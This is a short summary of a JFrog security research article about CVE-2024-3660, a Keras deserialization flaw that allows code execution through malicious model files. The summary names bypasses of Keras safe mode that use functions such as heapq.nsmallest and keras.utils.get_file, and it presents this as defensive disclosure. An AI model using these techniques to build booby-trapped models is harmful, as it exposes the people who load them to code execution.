Company
Date Published
Author
Andrey Polkovnichenko, JFrog Security Researcher
Word count
1562
Language
English
Hacker News points
None

Summary

Keras, a prominent machine learning framework, faced a critical security vulnerability identified as CVE-2024-3660, which allowed attackers to execute arbitrary code by exploiting its deserialization mechanism of Lambda layers in TensorFlow-based models. The issue arose from the ability to embed malicious code within model files, enabling arbitrary code execution when such models were loaded. To address this, Keras introduced a "safe mode" in version 2.13, which prevents the deserialization of potentially harmful Lambda layers by default. Despite this mitigation, challenges remain, as attackers can exploit existing Python functions on a victim's machine, such as the heapq.nsmallest function, to bypass safe mode restrictions and execute shell commands. Subsequent updates, including Keras version 3.9, partially remedied the issue by limiting function imports to specific Keras modules, yet potential exploits still exist within the Keras module itself, such as the keras.utils.get_file function. These findings underscore the necessity for robust security measures, including sandboxing and security scanning of untrusted machine learning models, to mitigate the risk of such vulnerabilities being exploited.